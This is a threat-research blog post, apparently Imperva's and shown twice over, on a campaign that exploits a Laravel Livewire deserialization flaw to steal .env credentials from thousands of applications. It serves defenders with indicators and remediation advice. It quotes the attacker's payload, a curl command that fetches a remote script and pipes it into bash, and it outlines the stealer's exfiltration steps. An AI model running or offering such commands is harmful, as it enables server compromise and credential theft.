9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
## **Introduction**
On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3).
The campaign, first documented here, has been running for several months, as evidenced by the large volume of stolen data. Recovery and analysis of the attacker's exfiltration infrastructure revealed credentials harvested from 6,167 distinct applications spanning dozens of countries and sectors, from e-commerce and healthcare to financial services, education, and government. The attacker's FTP server contained 1,851+ database dumps and 18+ email lists with over 26 million addresses, indicating the stolen credentials were being actively exploited. Attribution indicators throughout the malware and associated infrastructure point to an Indonesian-origin threat actor.
## **Attack Vectors and TTPs**
### **Initial Access: CVE-2025-54068 Exploitation**
CVE-2025-54068 is a critical vulnerability in Laravel Livewire v3 caused by improper validation of component property updates during the framework's hydration process. When a Livewire component state is restored from a browser request, Livewire v3 (up to v3.6.3) fails to verify the integrity of the submitted data before deserializing it. An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.
The following HTTP request, reconstructed from our captured attack traffic, illustrates the exploitation:
For full technical details on this vulnerability, please see the disclosure here.
### **Payload Analysis**
The exploitation requests we captured contained serialized PHP objects constructed using PHPGGC gadget chains. These chains abuse legitimate PHP classes already present in Laravel applications to achieve code execution during deserialization. The attacker's payload executes the following command:
**curl -skfsSL hxxps://xantibot[.]pw/database-sell/shoc.enz | tr -d '\r' | bash >/dev/null 2>&1 &**
This fetches a shell script from the attacker's C2 server and pipes it directly into bash, executing it in the background with all output suppressed.
## **Malware Analysis**
The credential stealer deployed in this campaign is a 5,269-byte Bash shell script named shoc.enz (**SHA256: 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e**). At the time of our analysis, this sample was not present in VirusTotal.
### **Execution Flow**
The malware follows an eight-stage execution process:
1. **Environment Setup** : Creates a temporary working directory at /tmp/xxxxx
2. **Process Check** : Verifies no existing shoc.sh processes are running to prevent multiple instances
3. **File Discovery** : Recursively scans the entire filesystem for .env files using the find command
4. **Credential Extraction** : Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values
5. **Data Collection** : Copies matching files to a staging directory with randomized filenames
6. **Compression** : Archives collected files using zip or tar.gz
7. **Exfiltration** : Uploads archives to three separate C2 channels
8. **Cleanup** : Deletes the local staging directory to remove forensic evidence
### **Exfiltration Infrastructure**
The threat actor operates a redundant three-channel exfiltration system:
**Channel** | **Endpoint** | **Purpose**
---|---|---
Primary | FTP @ 47.129.100.149:21 | Main credential storage
Secondary | api.telegram.org | Notifications and small file uploads
Tertiary | upload.gofile.io | Backup cloud storage
Our investigation confirmed active access to all three channels. The FTP server contained 7 directories of stolen data, including full database dumps such as FULL_DUMP_[REDACTED_IP]>_2026-04-29_0418.sql.gz. The GoFile account showed owner-level access with 11,179 files totalling 309.9 MB.
### **Attribution Indicators**
Multiple indicators point to an Indonesian-origin threat actor: Indonesian-language comments in the malware source code, a timezone reference to Asia/Jakarta, and the Telegram handle @ashtarotz ("黐線佬 Wong Gen Deng") linked to xantibot[.]pw, a domain that presents publicly as a legitimate anti-bot service while hosting the malware payload. Analysis of the domain, and telegram channel metadata also point to Indonesian origin.
The GoFile exfiltration account was registered to azrilsyahputra1337@gmail[.]com. Cross-referencing this address against public breach data reveals it appears in three separate historical breaches of BreachForums (November 2022, August 2025, and March 2026), placing the operator within underground breach communities over an extended period.
## **What Was Stolen: Analysis of the Recovered Data**
Laravel applications store all sensitive configuration in a single .env file: database credentials, API keys, payment processor secrets, cloud access keys, and encryption keys. This makes the file an exceptionally high-value target. A single .env file can provide everything needed to access the application's database, impersonate users, process payments, and access cloud infrastructure.
Analysis of the recovered collection revealed credentials from 6,167 distinct applications. Of 21,916 unique files analysed, 29% declared a production environment, though the true proportion is higher as many files labeled local contained live payment keys and real domain URLs.
The breakdown of exposed credentials:
**Credential Type** | **Count**
---|---
Database passwords (real, non-default) | 14,566 (66.5%)
Production applications with DB credentials | 5,784
Confirmed live Stripe secret keys (sk_live_) | 188
Valid AWS IAM credentials (AKIA format) | 381
JWT secrets | 2,929
Google OAuth client secrets (GOCSPX-) | 2,409
Filament admin panel passwords | 2,232
SMTP passwords | 7,176 (32.7%)
The FTP server contained over 1,850 full database dump files, confirming the stolen credentials were actively used to extract database contents.
## **Targeting**
The campaign scanned for vulnerable Laravel installations indiscriminately, with victims spanning online gambling and betting (400+ platforms, predominantly Brazilian and Southeast Asian operators), e-commerce, healthcare, education, logistics, and financial services. Multiple confirmed .gov domains were present in the dataset, showing the scanner made no distinction between commercial and public-sector targets. Recognizable open-source Laravel applications were present in the dataset, including the invoicing platform Invoice Ninja, accounting software Akaunting, event ticketing platform Attendize, photo gallery Lychee, and restaurant management system TastyIgniter. Applications were registered across .com, .ru, .site, .online, .br, .tr, .id, .ke, and dozens of other TLDs. Any organization running unpatched Laravel Livewire v3 was a potential victim.
## **Conclusion and Recommendations**
This campaign illustrates how straightforward credential theft, when combined with a high-impact vulnerability and automated scanning, can scale to thousands of victims in a short window. Recovery of the exfiltration infrastructure revealed credentials from over 6,000 distinct applications, including 188 live Stripe payment keys, 381 valid AWS IAM credentials, and database passwords for nearly 5,800 confirmed production systems. For many victims, the initial server compromise is only the beginning of the exposure.
We recommend the following actions for defenders:
1. **Patch immediately** : Update Laravel Livewire to version 3.6.4 or later to remediate CVE-2025-54068. This is the single most effective mitigation.
2. **Block outbound FTP** : Production web servers should not require outbound FTP access. Block port 21 egress and alert on any connection attempts to 47.129.100.149.
3. **Monitor for suspicious API access** : Alert on connections from web servers to api.telegram.org and upload.gofile.io, which are atypical for production Laravel applications.
If you believe your organization has been compromised, rotate all database credentials and Laravel APP_KEY values immediately, and review database access logs for unauthorized activity.
## **Indicators of Compromise**
### **IP Addresses**
* 86.88.234 (Attack source)
* 129.100.149 (FTP C2 server)
* 63.67.153 (Webhook server)
### **Domains and URLs**
* pw
* hxxps://xantibot[.]pw/database-sell/shoc.enz
* hxxps://webhook[.]site/b156c0b1-3e2f-41b4-a9a3-f492e50a0595
### **File Hashes (SHA-256)**
* 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e (shoc.enz)
### **MITRE ATT &CK Mapping**
**Technique ID** | **Technique Name** | **Campaign Usage**
---|---|---
T1190 | Exploit Public-Facing Application | CVE-2025-54068 exploitation
T1059.004 | Unix Shell | Bash script execution via piped curl
T1105 | Ingress Tool Transfer | curl retrieval of shoc.enz payload
T1083 | File and Directory Discovery | Recursive filesystem scan for .env files
T1552.001 | Credentials In Files | .env file harvesting
T1560.001 | Archive Collected Data: Archive via Utility | zip/tar.gz staging archive creation
T1041 | Exfiltration Over C2 Channel | Telegram Bot API exfiltration
T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | FTP exfiltration to 47.129.100.149
T1567.002 | Exfiltration to Cloud Storage | GoFile uploads
T1070.004 | File Deletion | Staging directory cleanup post-exfiltration
T1036 | Masquerading | Randomized archive and staging folder names
_Imperva Threat Research continues to monitor this campaign. Imperva customers are fully protected against exploitation of CVE-2025-54068. Customers requiring further guidance on this vulnerability are encouraged to contact Imperva support._
The post CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised appeared first on Blog.
On May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3).
The campaign, first documented here, has been running for several months, as evidenced by the large volume of stolen data. Recovery and analysis of the attacker's exfiltration infrastructure revealed credentials harvested from 6,167 distinct applications spanning dozens of countries and sectors, from e-commerce and healthcare to financial services, education, and government. The attacker's FTP server contained 1,851+ database dumps and 18+ email lists with over 26 million addresses, indicating the stolen credentials were being actively exploited. Attribution indicators throughout the malware and associated infrastructure point to an Indonesian-origin threat actor.
## **Attack Vectors and TTPs**
### **Initial Access: CVE-2025-54068 Exploitation**
CVE-2025-54068 is a critical vulnerability in Laravel Livewire v3 caused by improper validation of component property updates during the framework's hydration process. When a Livewire component state is restored from a browser request, Livewire v3 (up to v3.6.3) fails to verify the integrity of the submitted data before deserializing it. An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.
The following HTTP request, reconstructed from our captured attack traffic, illustrates the exploitation:
For full technical details on this vulnerability, please see the disclosure here.
### **Payload Analysis**
The exploitation requests we captured contained serialized PHP objects constructed using PHPGGC gadget chains. These chains abuse legitimate PHP classes already present in Laravel applications to achieve code execution during deserialization. The attacker's payload executes the following command:
**curl -skfsSL hxxps://xantibot[.]pw/database-sell/shoc.enz | tr -d '\r' | bash >/dev/null 2>&1 &**
This fetches a shell script from the attacker's C2 server and pipes it directly into bash, executing it in the background with all output suppressed.
## **Malware Analysis**
The credential stealer deployed in this campaign is a 5,269-byte Bash shell script named shoc.enz (**SHA256: 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e**). At the time of our analysis, this sample was not present in VirusTotal.
### **Execution Flow**
The malware follows an eight-stage execution process:
1. **Environment Setup** : Creates a temporary working directory at /tmp/xxxxx
2. **Process Check** : Verifies no existing shoc.sh processes are running to prevent multiple instances
3. **File Discovery** : Recursively scans the entire filesystem for .env files using the find command
4. **Credential Extraction** : Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values
5. **Data Collection** : Copies matching files to a staging directory with randomized filenames
6. **Compression** : Archives collected files using zip or tar.gz
7. **Exfiltration** : Uploads archives to three separate C2 channels
8. **Cleanup** : Deletes the local staging directory to remove forensic evidence
### **Exfiltration Infrastructure**
The threat actor operates a redundant three-channel exfiltration system:
**Channel** | **Endpoint** | **Purpose**
---|---|---
Primary | FTP @ 47.129.100.149:21 | Main credential storage
Secondary | api.telegram.org | Notifications and small file uploads
Tertiary | upload.gofile.io | Backup cloud storage
Our investigation confirmed active access to all three channels. The FTP server contained 7 directories of stolen data, including full database dumps such as FULL_DUMP_[REDACTED_IP]>_2026-04-29_0418.sql.gz. The GoFile account showed owner-level access with 11,179 files totalling 309.9 MB.
### **Attribution Indicators**
Multiple indicators point to an Indonesian-origin threat actor: Indonesian-language comments in the malware source code, a timezone reference to Asia/Jakarta, and the Telegram handle @ashtarotz ("黐線佬 Wong Gen Deng") linked to xantibot[.]pw, a domain that presents publicly as a legitimate anti-bot service while hosting the malware payload. Analysis of the domain, and telegram channel metadata also point to Indonesian origin.
The GoFile exfiltration account was registered to azrilsyahputra1337@gmail[.]com. Cross-referencing this address against public breach data reveals it appears in three separate historical breaches of BreachForums (November 2022, August 2025, and March 2026), placing the operator within underground breach communities over an extended period.
## **What Was Stolen: Analysis of the Recovered Data**
Laravel applications store all sensitive configuration in a single .env file: database credentials, API keys, payment processor secrets, cloud access keys, and encryption keys. This makes the file an exceptionally high-value target. A single .env file can provide everything needed to access the application's database, impersonate users, process payments, and access cloud infrastructure.
Analysis of the recovered collection revealed credentials from 6,167 distinct applications. Of 21,916 unique files analysed, 29% declared a production environment, though the true proportion is higher as many files labeled local contained live payment keys and real domain URLs.
The breakdown of exposed credentials:
**Credential Type** | **Count**
---|---
Database passwords (real, non-default) | 14,566 (66.5%)
Production applications with DB credentials | 5,784
Confirmed live Stripe secret keys (sk_live_) | 188
Valid AWS IAM credentials (AKIA format) | 381
JWT secrets | 2,929
Google OAuth client secrets (GOCSPX-) | 2,409
Filament admin panel passwords | 2,232
SMTP passwords | 7,176 (32.7%)
The FTP server contained over 1,850 full database dump files, confirming the stolen credentials were actively used to extract database contents.
## **Targeting**
The campaign scanned for vulnerable Laravel installations indiscriminately, with victims spanning online gambling and betting (400+ platforms, predominantly Brazilian and Southeast Asian operators), e-commerce, healthcare, education, logistics, and financial services. Multiple confirmed .gov domains were present in the dataset, showing the scanner made no distinction between commercial and public-sector targets. Recognizable open-source Laravel applications were present in the dataset, including the invoicing platform Invoice Ninja, accounting software Akaunting, event ticketing platform Attendize, photo gallery Lychee, and restaurant management system TastyIgniter. Applications were registered across .com, .ru, .site, .online, .br, .tr, .id, .ke, and dozens of other TLDs. Any organization running unpatched Laravel Livewire v3 was a potential victim.
## **Conclusion and Recommendations**
This campaign illustrates how straightforward credential theft, when combined with a high-impact vulnerability and automated scanning, can scale to thousands of victims in a short window. Recovery of the exfiltration infrastructure revealed credentials from over 6,000 distinct applications, including 188 live Stripe payment keys, 381 valid AWS IAM credentials, and database passwords for nearly 5,800 confirmed production systems. For many victims, the initial server compromise is only the beginning of the exposure.
We recommend the following actions for defenders:
1. **Patch immediately** : Update Laravel Livewire to version 3.6.4 or later to remediate CVE-2025-54068. This is the single most effective mitigation.
2. **Block outbound FTP** : Production web servers should not require outbound FTP access. Block port 21 egress and alert on any connection attempts to 47.129.100.149.
3. **Monitor for suspicious API access** : Alert on connections from web servers to api.telegram.org and upload.gofile.io, which are atypical for production Laravel applications.
If you believe your organization has been compromised, rotate all database credentials and Laravel APP_KEY values immediately, and review database access logs for unauthorized activity.
## **Indicators of Compromise**
### **IP Addresses**
* 86.88.234 (Attack source)
* 129.100.149 (FTP C2 server)
* 63.67.153 (Webhook server)
### **Domains and URLs**
* pw
* hxxps://xantibot[.]pw/database-sell/shoc.enz
* hxxps://webhook[.]site/b156c0b1-3e2f-41b4-a9a3-f492e50a0595
### **File Hashes (SHA-256)**
* 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e (shoc.enz)
### **MITRE ATT &CK Mapping**
**Technique ID** | **Technique Name** | **Campaign Usage**
---|---|---
T1190 | Exploit Public-Facing Application | CVE-2025-54068 exploitation
T1059.004 | Unix Shell | Bash script execution via piped curl
T1105 | Ingress Tool Transfer | curl retrieval of shoc.enz payload
T1083 | File and Directory Discovery | Recursive filesystem scan for .env files
T1552.001 | Credentials In Files | .env file harvesting
T1560.001 | Archive Collected Data: Archive via Utility | zip/tar.gz staging archive creation
T1041 | Exfiltration Over C2 Channel | Telegram Bot API exfiltration
T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | FTP exfiltration to 47.129.100.149
T1567.002 | Exfiltration to Cloud Storage | GoFile uploads
T1070.004 | File Deletion | Staging directory cleanup post-exfiltration
T1036 | Masquerading | Randomized archive and staging folder names
_Imperva Threat Research continues to monitor this campaign. Imperva customers are fully protected against exploitation of CVE-2025-54068. Customers requiring further guidance on this vulnerability are encouraged to contact Imperva support._
The post CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised appeared first on Blog.
Basic Information
ID
IMPERVABLOG:CC22F53AF67610E01435FC711BB2B03F
Published
Jun 23, 2026 at 18:01